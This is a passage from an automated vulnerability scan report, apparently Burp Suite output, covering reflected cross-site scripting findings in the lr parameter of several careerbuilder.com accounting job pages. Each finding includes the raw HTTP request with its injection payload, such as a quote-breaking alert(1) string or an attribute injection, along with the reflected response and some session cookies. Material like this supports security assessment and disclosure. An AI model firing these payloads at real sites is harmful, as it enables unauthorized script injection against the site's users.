X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=742b47a46d174153b38634de2ce397ba-343070627-RE-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6502B7EE094B552B2B70BBA9219CA94E77CE10351649902F41F8211398221DB738F2E1EB2D4C61F7C85; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:46 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:46 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL14
Date: Sun, 14 Nov 2010 22:23:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.22. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e36f"%20a%3db%20a374526cf1f was submitted in the lr parameter. This input was echoed as 3e36f" a=b a374526cf1f in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami/?lr=cbcb_mh3e36f"%20a%3db%20a374526cf1f&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190052
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=4c1214c5309e47ab9c6e1f3f48696a30-343070602-R8-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508CD4B507BB40F27D5D49BB4DD41970517DAD82ED8DF2ADD73243653D37836DEF1D333B1CB075ACFF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:22 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:22 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL8
Date: Sun, 14 Nov 2010 22:23:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mh3e36f" a=b a374526cf1f" />
...[SNIP]...

2.23. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9012c"%20a%3db%20369a2cb1a28 was submitted in the lr parameter. This input was echoed as 9012c" a=b 369a2cb1a28 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59012c"%20a%3db%20369a2cb1a28&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196910
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:06:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a59012c" a=b 369a2cb1a28" />
...[SNIP]...

2.24. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec784'-alert(1)-'194462e6124 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197437
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR22
Date: Sun, 14 Nov 2010 23:08:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5ec784'-alert(1)-'194462e6124&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.25. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c701a'-alert(1)-'781f62259bc was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197657
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR32
Date: Sun, 14 Nov 2010 23:06:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5c701a'-alert(1)-'781f62259bc&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.26. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsPayable.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsPayable.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f1a9"%20a%3db%20e961c1b811c was submitted in the lr parameter. This input was echoed as 9f1a9" a=b e961c1b811c in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_AccountsPayable.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a59f1a9"%20a%3db%20e961c1b811c&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 197275
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountspayable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:05:20 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa'-alert(1)-'9d78db8d0a59f1a9" a=b e961c1b811c" />
...[SNIP]...

2.27. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ba5c'-alert(1)-'68fa7d568e0 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190323
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accountsreceivable.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR14
Date: Sun, 14 Nov 2010 23:14:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7ba5c'-alert(1)-'68fa7d568e0&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.28. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_AccountsReceivable.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_AccountsReceivable.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be2ee"%20a%3db%20fed0e7e8bc3 was submitted in the lr parameter. This input was echoed as be2ee" a=b fed0e7e8bc3 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_AccountsReceivable.htm?IPath=OCP&lr=cbcb_mhf48aabe2ee"%20a%3db%20fed0e7e8bc3 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195095
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR1
Date: Sun, 14 Nov 2010 23:11:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aabe2ee" a=b fed0e7e8bc3" />
...[SNIP]...

2.29. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Auditing.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7154c'-alert(1)-'d6bb816219f was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190040
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:13:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa7154c'-alert(1)-'d6bb816219f&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.30. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Auditing.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Auditing.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdbc"%20a%3db%205fc987899df was submitted in the lr parameter. This input was echoed as 2cdbc" a=b 5fc987899df in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Auditing.htm?IPath=OCP&lr=cbcb_mhf48aa2cdbc"%20a%3db%205fc987899df HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189439
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_auditing.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:09:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa2cdbc" a=b 5fc987899df" />
...[SNIP]...

2.31. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Bookkeeping.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07c4'-alert(1)-'57936a51b86 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190038
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:12:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aab07c4'-alert(1)-'57936a51b86&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.32. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Bookkeeping.htm [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Bookkeeping.htm

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45eed"%20a%3db%206df7f904442 was submitted in the lr parameter. This input was echoed as 45eed" a=b 6df7f904442 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami_Bookkeeping.htm?IPath=OCP&lr=cbcb_mhf48aa45eed"%20a%3db%206df7f904442 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189492
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_bookkeeping.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:10:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa45eed" a=b 6df7f904442" />
...[SNIP]...

2.33. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_CPA.htm

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f293'-alert(1)-'786db9e58ce was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami_CPA.htm?IPath=OCP&lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 189895
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_cpa.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL12
Date: Sun, 14 Nov 2010 23:22:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa3f293'-alert(1)-'786db9e58ce&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.34. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_CPA.htm [lr parameter]

Summary

